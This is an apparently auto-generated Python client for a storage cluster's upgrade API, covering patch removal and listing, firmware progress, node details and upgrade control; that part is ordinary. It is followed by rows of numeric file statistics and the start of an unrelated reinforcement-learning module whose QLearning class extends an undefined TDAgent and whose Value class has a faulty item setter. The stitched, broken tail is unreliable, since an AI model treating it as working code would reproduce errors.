def delete_cluster_patch_patch_with_http_info(self, cluster_patch_patch_id, **kwargs): # noqa: E501
"""delete_cluster_patch_patch # noqa: E501
Uninstall a patch. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_cluster_patch_patch_with_http_info(cluster_patch_patch_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str cluster_patch_patch_id: Uninstall a patch. (required)
:param bool skip_version_check: Bypass version checks. Defaults to false.
:param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
:param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
:param bool simultaneous: Uninstall the patch on all nodes at once. Defaults to false.
:param bool rolling: Install the patch on one node at a time. Defaults to true.
:param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_patch_patch_id', 'skip_version_check', 'skip_conflict_check', 'skip_restricted_check', 'simultaneous', 'rolling', 'skip_dependency_check'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_cluster_patch_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_patch_patch_id' is set
if ('cluster_patch_patch_id' not in params or
params['cluster_patch_patch_id'] is None):
raise ValueError("Missing the required parameter `cluster_patch_patch_id` when calling `delete_cluster_patch_patch`") # noqa: E501
collection_formats = {}
path_params = {}
if 'cluster_patch_patch_id' in params:
path_params['ClusterPatchPatchId'] = params['cluster_patch_patch_id'] # noqa: E501
query_params = []
if 'skip_version_check' in params:
query_params.append(('skip_version_check', params['skip_version_check'])) # noqa: E501
if 'skip_conflict_check' in params:
query_params.append(('skip_conflict_check', params['skip_conflict_check'])) # noqa: E501
if 'skip_restricted_check' in params:
query_params.append(('skip_restricted_check', params['skip_restricted_check'])) # noqa: E501
if 'simultaneous' in params:
query_params.append(('simultaneous', params['simultaneous'])) # noqa: E501
if 'rolling' in params:
query_params.append(('rolling', params['rolling'])) # noqa: E501
if 'skip_dependency_check' in params:
query_params.append(('skip_dependency_check', params['skip_dependency_check'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/7/upgrade/cluster/patch/patches/{ClusterPatchPatchId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cluster_firmware_progress(self, **kwargs): # noqa: E501
"""get_cluster_firmware_progress # noqa: E501
Cluster wide firmware upgrade status info. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_firmware_progress(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ClusterFirmwareProgress
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cluster_firmware_progress_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_cluster_firmware_progress_with_http_info(**kwargs) # noqa: E501
return data
def get_cluster_firmware_progress_with_http_info(self, **kwargs): # noqa: E501
"""get_cluster_firmware_progress # noqa: E501
Cluster wide firmware upgrade status info. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_firmware_progress_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ClusterFirmwareProgress
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_firmware_progress" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/firmware/progress', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterFirmwareProgress', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cluster_firmware_status(self, **kwargs): # noqa: E501
"""get_cluster_firmware_status # noqa: E501
The firmware status for the cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_firmware_status(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool refresh: Re-gather firmware status. Default is false.
:param bool devices: Show devices. If false, this returns an empty list. Default is false.
:param bool package: Show package. If false, this returns an empty list. Default is false.
:return: ClusterFirmwareStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cluster_firmware_status_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_cluster_firmware_status_with_http_info(**kwargs) # noqa: E501
return data
def get_cluster_firmware_status_with_http_info(self, **kwargs): # noqa: E501
"""get_cluster_firmware_status # noqa: E501
The firmware status for the cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_firmware_status_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool refresh: Re-gather firmware status. Default is false.
:param bool devices: Show devices. If false, this returns an empty list. Default is false.
:param bool package: Show package. If false, this returns an empty list. Default is false.
:return: ClusterFirmwareStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['refresh', 'devices', 'package'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_firmware_status" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'refresh' in params:
query_params.append(('refresh', params['refresh'])) # noqa: E501
if 'devices' in params:
query_params.append(('devices', params['devices'])) # noqa: E501
if 'package' in params:
query_params.append(('package', params['package'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/firmware/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterFirmwareStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cluster_node(self, cluster_node_id, **kwargs): # noqa: E501
"""get_cluster_node # noqa: E501
The node details useful during an upgrade or assessment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_node(cluster_node_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int cluster_node_id: The node details useful during an upgrade or assessment. (required)
:return: ClusterNodes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cluster_node_with_http_info(cluster_node_id, **kwargs) # noqa: E501
else:
(data) = self.get_cluster_node_with_http_info(cluster_node_id, **kwargs) # noqa: E501
return data
def get_cluster_node_with_http_info(self, cluster_node_id, **kwargs): # noqa: E501
"""get_cluster_node # noqa: E501
The node details useful during an upgrade or assessment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_node_with_http_info(cluster_node_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int cluster_node_id: The node details useful during an upgrade or assessment. (required)
:return: ClusterNodes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_node_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_node" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_node_id' is set
if ('cluster_node_id' not in params or
params['cluster_node_id'] is None):
raise ValueError("Missing the required parameter `cluster_node_id` when calling `get_cluster_node`") # noqa: E501
collection_formats = {}
path_params = {}
if 'cluster_node_id' in params:
path_params['ClusterNodeId'] = params['cluster_node_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/nodes/{ClusterNodeId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterNodes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cluster_nodes(self, **kwargs): # noqa: E501
"""get_cluster_nodes # noqa: E501
View information about nodes during an upgrade, rollback, or pre-upgrade assessment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_nodes(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ClusterNodesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cluster_nodes_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_cluster_nodes_with_http_info(**kwargs) # noqa: E501
return data
def get_cluster_nodes_with_http_info(self, **kwargs): # noqa: E501
"""get_cluster_nodes # noqa: E501
View information about nodes during an upgrade, rollback, or pre-upgrade assessment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_nodes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ClusterNodesExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_nodes" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/nodes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterNodesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cluster_patch_patch(self, cluster_patch_patch_id, **kwargs): # noqa: E501
"""get_cluster_patch_patch # noqa: E501
View a single patch. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_patch_patch(cluster_patch_patch_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str cluster_patch_patch_id: View a single patch. (required)
:param bool local: View patch information on local node only.
:param str location: Path location of patch file.
:return: ClusterPatchPatches
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cluster_patch_patch_with_http_info(cluster_patch_patch_id, **kwargs) # noqa: E501
else:
(data) = self.get_cluster_patch_patch_with_http_info(cluster_patch_patch_id, **kwargs) # noqa: E501
return data
def get_cluster_patch_patch_with_http_info(self, cluster_patch_patch_id, **kwargs): # noqa: E501
"""get_cluster_patch_patch # noqa: E501
View a single patch. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cluster_patch_patch_with_http_info(cluster_patch_patch_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str cluster_patch_patch_id: View a single patch. (required)
:param bool local: View patch information on local node only.
:param str location: Path location of patch file.
:return: ClusterPatchPatches
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_patch_patch_id', 'local', 'location'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_patch_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_patch_patch_id' is set
if ('cluster_patch_patch_id' not in params or
params['cluster_patch_patch_id'] is None):
raise ValueError("Missing the required parameter `cluster_patch_patch_id` when calling `get_cluster_patch_patch`") # noqa: E501
if ('location' in params and
len(params['location']) > 4096):
raise ValueError("Invalid value for parameter `location` when calling `get_cluster_patch_patch`, length must be less than or equal to `4096`") # noqa: E501
if ('location' in params and
len(params['location']) < 0):
raise ValueError("Invalid value for parameter `location` when calling `get_cluster_patch_patch`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'cluster_patch_patch_id' in params:
path_params['ClusterPatchPatchId'] = params['cluster_patch_patch_id'] # noqa: E501
query_params = []
if 'local' in params:
query_params.append(('local', params['local'])) # noqa: E501
if 'location' in params:
query_params.append(('location', params['location'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/7/upgrade/cluster/patch/patches/{ClusterPatchPatchId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterPatchPatches', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_upgrade_cluster(self, **kwargs): # noqa: E501
"""get_upgrade_cluster # noqa: E501
Cluster wide upgrade status info. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_upgrade_cluster(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UpgradeCluster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_upgrade_cluster_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_upgrade_cluster_with_http_info(**kwargs) # noqa: E501
return data
def get_upgrade_cluster_with_http_info(self, **kwargs): # noqa: E501
"""get_upgrade_cluster # noqa: E501
Cluster wide upgrade status info. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_upgrade_cluster_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: UpgradeCluster
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_upgrade_cluster" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/7/upgrade/cluster', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpgradeCluster', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_cluster_patch_patches(self, **kwargs): # noqa: E501
"""list_cluster_patch_patches # noqa: E501
List all patches. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cluster_patch_patches(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param int limit: Return no more than this many results at once (see resume).
:param str location: Path location of patch file.
:param bool local: View patches on the local node only.
:param str dir: The direction of the sort.
:return: ClusterPatchPatchesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_cluster_patch_patches_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_cluster_patch_patches_with_http_info(**kwargs) # noqa: E501
return data
def list_cluster_patch_patches_with_http_info(self, **kwargs): # noqa: E501
"""list_cluster_patch_patches # noqa: E501
List all patches. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_cluster_patch_patches_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param int limit: Return no more than this many results at once (see resume).
:param str location: Path location of patch file.
:param bool local: View patches on the local node only.
:param str dir: The direction of the sort.
:return: ClusterPatchPatchesExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'resume', 'limit', 'location', 'local', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_cluster_patch_patches" % key
)
params[key] = val
del params['kwargs']
if ('sort' in params and
len(params['sort']) > 255):
raise ValueError("Invalid value for parameter `sort` when calling `list_cluster_patch_patches`, length must be less than or equal to `255`") # noqa: E501
if ('sort' in params and
len(params['sort']) < 0):
raise ValueError("Invalid value for parameter `sort` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_cluster_patch_patches`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cluster_patch_patches`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_cluster_patch_patches`, must be a value greater than or equal to `1`") # noqa: E501
if ('location' in params and
len(params['location']) > 4096):
raise ValueError("Invalid value for parameter `location` when calling `list_cluster_patch_patches`, length must be less than or equal to `4096`") # noqa: E501
if ('location' in params and
len(params['location']) < 0):
raise ValueError("Invalid value for parameter `location` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'location' in params:
query_params.append(('location', params['location'])) # noqa: E501
if 'local' in params:
query_params.append(('local', params['local'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/7/upgrade/cluster/patch/patches', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterPatchPatchesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_cluster_unblock(self, cluster_unblock, **kwargs): # noqa: E501
"""update_cluster_unblock # noqa: E501
Unblock parallel upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_cluster_unblock(cluster_unblock, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterUnblock cluster_unblock: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_cluster_unblock_with_http_info(cluster_unblock, **kwargs) # noqa: E501
else:
(data) = self.update_cluster_unblock_with_http_info(cluster_unblock, **kwargs) # noqa: E501
return data
def update_cluster_unblock_with_http_info(self, cluster_unblock, **kwargs): # noqa: E501
"""update_cluster_unblock # noqa: E501
Unblock parallel upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_cluster_unblock_with_http_info(cluster_unblock, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterUnblock cluster_unblock: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_unblock'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_cluster_unblock" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_unblock' is set
if ('cluster_unblock' not in params or
params['cluster_unblock'] is None):
raise ValueError("Missing the required parameter `cluster_unblock` when calling `update_cluster_unblock`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_unblock' in params:
body_params = params['cluster_unblock']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/9/upgrade/cluster/unblock', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_cluster_upgrade(self, cluster_upgrade, **kwargs): # noqa: E501
"""update_cluster_upgrade # noqa: E501
Add nodes to a running upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_cluster_upgrade(cluster_upgrade, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterUpgrade cluster_upgrade: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_cluster_upgrade_with_http_info(cluster_upgrade, **kwargs) # noqa: E501
else:
(data) = self.update_cluster_upgrade_with_http_info(cluster_upgrade, **kwargs) # noqa: E501
return data
def update_cluster_upgrade_with_http_info(self, cluster_upgrade, **kwargs): # noqa: E501
"""update_cluster_upgrade # noqa: E501
Add nodes to a running upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_cluster_upgrade_with_http_info(cluster_upgrade, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterUpgrade cluster_upgrade: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_upgrade'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_cluster_upgrade" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_upgrade' is set
if ('cluster_upgrade' not in params or
params['cluster_upgrade'] is None):
raise ValueError("Missing the required parameter `cluster_upgrade` when calling `update_cluster_upgrade`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_upgrade' in params:
body_params = params['cluster_upgrade']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/9/upgrade/cluster/upgrade', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.656367
| 183
| 0.633602
| 11,845
| 102,162
| 5.164458
| 0.024483
| 0.049695
| 0.021055
| 0.027071
| 0.977294
| 0.964707
| 0.950043
| 0.930574
| 0.917905
| 0.907508
| 0
| 0.016812
| 0.280956
| 102,162
| 2,394
| 184
| 42.674185
| 0.815938
| 0.323966
| 0
| 0.759785
| 1
| 0.008442
| 0.226
| 0.087395
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036071
| false
| 0
| 0.00307
| 0
| 0.092863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c709941bf1f52dec018b7f9ee9f67535a956980
| 9,682
|
py
|
Python
|
comgames/AI/TD.py
|
houluy/comgames
|
aa2bcb6ef0d16807bab0eebcfe9a4818aebc0c3b
|
[
"MIT"
] | 2
|
2018-02-21T16:00:20.000Z
|
2018-06-18T10:22:21.000Z
|
comgames/AI/TD.py
|
houluy/comgames
|
aa2bcb6ef0d16807bab0eebcfe9a4818aebc0c3b
|
[
"MIT"
] | null | null | null |
comgames/AI/TD.py
|
houluy/comgames
|
aa2bcb6ef0d16807bab0eebcfe9a4818aebc0c3b
|
[
"MIT"
] | null | null | null |
import random
from collections import defaultdict, UserDict
import logging
import pickle
import pathlib
import json
import src.game
from .config import config
from .agent import Agent
class Value(UserDict):
def __init__(self):
super().__init__()
def _state2str(self, state):
return ''.join([str(x) for x in state])
def __setitem__(self, key, value):
if super().__getitem__(key) < value:
super().__setitem__(self._state2str(key), value)
class QLearning(TDAgent):
def __init__(self, new=False):
super().__init__(new)
self.params = config.get(game_name).get("Q_learning")
self.num_episodes = self.params.get('num_episodes')
self.min_epsilon = self.params.get("min_epsilon")
